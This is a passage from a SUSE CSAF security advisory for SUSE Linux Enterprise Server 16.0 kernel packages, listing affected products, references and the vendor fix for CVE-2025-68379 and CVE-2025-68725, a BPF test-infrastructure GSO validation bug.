"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
